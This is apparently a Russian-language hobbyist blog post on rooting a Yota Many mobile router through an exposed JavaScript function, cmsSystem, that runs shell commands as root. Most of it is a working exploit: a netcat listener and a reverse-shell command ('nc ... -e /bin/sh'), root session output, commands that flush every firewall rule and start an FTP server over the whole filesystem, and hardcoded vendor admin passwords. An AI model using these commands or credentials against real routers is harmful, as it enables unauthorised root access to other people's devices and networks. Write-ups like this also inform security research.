Добрый день!
Как Вы думаете, каким минимальным количеством инструментов можно получить SSH-доступ к роутеру Yota Many?
А SSH-доступ с root-правами?
Вы, скорее всего удивитесь, но ответ — двумя, в обоих случаях. Это Ваш браузер и Netcat.
Я очень удивился, когда случайно в списке подключаемых JS-скриптов на странице http://status.yota.ru/ я увидел
этот http://status.yota.ru/js/devControl.js, а в нём вот такую функцию:
function cmsSystem(s,callback) {
if (simulator) {
setTimeout(function () { callback(0); },100);
return;
}
var r={};
r.authparam=calcAuthParam();
r.system=s;
r.command="system";
$.post(
devCtrlUrl, r, callback, "json"
).error(devErrorHandler);
}
А использовалась эта функция, в этом же файле, например, так:
cmsSystem(
"( killall up_cli ; rm -rf /mnt/jffs2/upload/* ) 1>/dev/null 2>/dev/null",
function() { callback(true); }
);
Чувствуете чем пахнет?
Да, эта функция выполняла команду в консоли роутера, но вывода результата она не имела (ну, точнее имела, но не совсем результата).
Тогда я решил поступить следующим образом.
Первое, что нам нужно — скачать Netcat(Windows, Unix) и запустить его с параметрами:
nc -n -vv -l -p 5566
Где:
- 5566 — порт на нашем компьютере, на котором Netcat будет ждать соеденения.
Получаем следующее:
listening on [any] 5566 ...
Второе — запустить браузер и перейти в консоль JavaScript (в Google Chrome — F12, вкладка Console) и ввести команду:
cmsSystem("nc 10.0.0.33 5566 -e /bin/sh", null);
Где:
- 10.0.0.33 — IP-адрес выданный Вашему компьютеру роутером.
- 5566 — порт на нашем компьютере, на котором мы ждем подключения.
Через мгновение в нашей консоли мы увидим:
connect to [10.0.0.33] from (UNKNOWN) [10.0.0.2] 48656
После чего смело выполняем команды так, как будто мы это делали по SSH (все команды выполняются от имени root).
id
uid=0(root) gid=0(root)
uname -a
Linux 9615-cdp 3.0.21+ #1 PREEMPT Tue Apr 30 18:09:49 CST 2013 armv7l GNU/Linux
cat /proc/version
Linux version 3.0.21+ (kevin@kevin-android-build-system) (gcc ver1117 (prerelease) (GCC))
#1 PREEMPT Tue Apr 30 18:09:49 CST 2013
cat /proc/cpuinfo
Processor : ARMv7 Processor rev 1 (v7l)
BogoMIPS : 274.02
Features : swp half thumb fastmult vfp edsp neon vfpv3 tls vfpv4
CPU implementer : 0x41
CPU architecture: 7
CPU variant : 0x0
CPU part : 0xc05
CPU revision : 1
Hardware : QCT MSM9615 CDP
Revision : 0000
Serial : 0000000000000000
cat /proc/meminfo
MemTotal: 44184 kB
MemFree: 2476 kB
Buffers: 0 kB
Cached: 10108 kB
SwapCached: 0 kB
Active: 13868 kB
Inactive: 4840 kB
Active(anon): 8652 kB
Inactive(anon): 16 kB
Active(file): 5216 kB
Inactive(file): 4824 kB
Unevictable: 0 kB
Mlocked: 0 kB
HighTotal: 0 kB
HighFree: 0 kB
LowTotal: 44184 kB
LowFree: 2476 kB
SwapTotal: 0 kB
SwapFree: 0 kB
Dirty: 0 kB
Writeback: 0 kB
AnonPages: 8616 kB
Mapped: 5388 kB
Shmem: 68 kB
Slab: 16900 kB
SReclaimable: 11744 kB
SUnreclaim: 5156 kB
KernelStack: 1336 kB
PageTables: 1216 kB
NFS_Unstable: 0 kB
Bounce: 0 kB
WritebackTmp: 0 kB
CommitLimit: 22092 kB
Committed_AS: 484816 kB
VmallocTotal: 827392 kB
VmallocUsed: 301728 kB
VmallocChunk: 519164 kB
free -m
total used free shared buffers
Mem: 43 40 2 0 0
-/+ buffers: 40 2
Swap: 0 0 0
df -h
Filesystem Size Used Available Use% Mounted on
/dev/root 33.6M 30.1M 3.5M 90% /
tmpfs 21.6M 52.0K 21.5M 0% /tmp
none 21.6M 8.0K 21.6M 0% /dev
tmpfs 21.6M 4.0K 21.6M 0% /dev/shm
/dev/mtdblock15 44.1M 1.4M 42.7M 3% /mnt/jffs2
/dev/mtdblock10 28.8M 19.9M 8.9M 69% /usr
top
Mem: 41756K used, 2428K free, 0K shrd, 0K buff, 10136K cached
CPU: 30.7% usr 23.0% sys 0.0% nic 46.1% idle 0.0% io 0.0% irq 0.0% sirq
Load average: 1.01 1.09 1.11 1/167 8372
m PID PPID USER STAT VSZ %MEM CPU %CPU COMMAND
8372 4979 root R 3040 6.8 0 23.0 top
862 1 root S 96700218.3 0 0.0 QCMAP_ConnectionManager /etc/mobil
672 1 root S 86448195.2 0 0.0 /usr/bin/qmuxd
864 1 root S 46288104.5 0 0.0 lte_cm
691 1 root S 44960101.5 0 0.0 /usr/bin/netmgrd -u /etc/udhcpc.d/
644 1 root S 36400 82.2 0 0.0 qti
4368 1 root S 36384 82.1 0 0.0 /usr/bin/cxmapp
602 1 root S 34588 78.1 0 0.0 /bin/msg_center
540 1 root S 25424 57.4 0 0.0 /sbin/adbd
707 688 root S 20396 46.0 0 0.0 /usr/bin/mbimd
663 1 root S 20212 45.6 0 0.0 /usr/bin/atfwd_daemon
1211 1 root S 18272 41.2 0 0.0 /yota/cgi-bin/wpdaemon.cgi start
775 1 root S 18140 40.9 0 0.0 /bin/user_in_ctl server
657 1 root S 11604 26.2 0 0.0 /usr/bin/diagrebootapp
783 1 root S 9940 22.4 0 0.0 /bin/epd_ctl
1116 1 root S 4992 11.2 0 0.0 lighttpd -f /etc2/lighttpd/lighttp
619 612 root S 4368 9.8 0 0.0 up_cli
4544 1 root S 3908 8.8 0 0.0 hostapd -B /tmp/hostapd1.conf
612 1 root S 3040 6.8 0 0.0 /bin/sh /yota/up_cli_watchdog.sh
4274 1 root S 3040 6.8 0 0.0 /bin/sh /bin/modem_led.sh
iptables -L
Chain INPUT (policy ACCEPT)
target prot opt source destination
DROP all -- anywhere 10.0.0.0/24
Chain FORWARD (policy ACCEPT)
target prot opt source destination
DROP all -- anywhere anywhere
DROP all -- anywhere 10.0.0.4
Chain OUTPUT (policy ACCEPT)
target prot opt source destination
Устройство, мягко говоря, не блещет производительностью.
У меня не получилось поставить что-либо через ipkg, из-за малого количества оперативки и отсутствия SWAP — ipkg постоянно падает с «segmentation fault» (может у меня руки кривые?)
Включаем стандартную админ-панель производителя
Включаем встроенный FTP-сервер
Для начала нам надо почистить iptables:
cmsSystem("iptables -F", null);
cmsSystem("iptables -X", null);
cmsSystem("iptables -t nat -F", null);
cmsSystem("iptables -t nat -X", null);
cmsSystem("iptables -t mangle -F", null);
cmsSystem("iptables -t mangle -X", null);
cmsSystem("iptables -P INPUT ACCEPT", null);
cmsSystem("iptables -P FORWARD ACCEPT", null);
cmsSystem("iptables -P OUTPUT ACCEPT", null);
После чего перезагрузить роутер:
rebootDevice(null);
Далее включаем FTP-сервер:
cmsSystem("tcpsvd -vE 0.0.0.0 21 ftpd -w /", null);
И любым FTP-клиентом заходим на ftp://10.0.0.1:21/
Идем в /etc2/lighttpd/ и правим lighttpd.conf, добавляем после $HTTP["host"] == "status.yota.ru" { ... } вот это:
$HTTP["host"] == "full.yota.ru" {
server.document-root = "/www/"
}
Идем в /etc/ и правим hosts, добавляем в конце файла:
10.0.0.1 full.yota.ru
Переходим в браузере по адресу http://full.yota.ru/.
Вводим имя пользователя gemtek и пароль gemtek0978 (или operator, пароль operator).
Наслаждаемся нормальной, не урезанной административной панелью:
Имена пользователей находятся в /mnt/jffs2/conf/user/ui.conf, пароли в /mnt/jffs2/conf/user/httpasswd.conf
Пароли настоятельно рекомендую изменить!
На этом моё баловство закончилось, но я надеюсь, что в комментариях подскажут как побороть проблемы с ipkg и восстановлением состояния iptables после перезагрузки(которое, кстати, не влияет на FTP сервер).
Автор: dkuzevanov
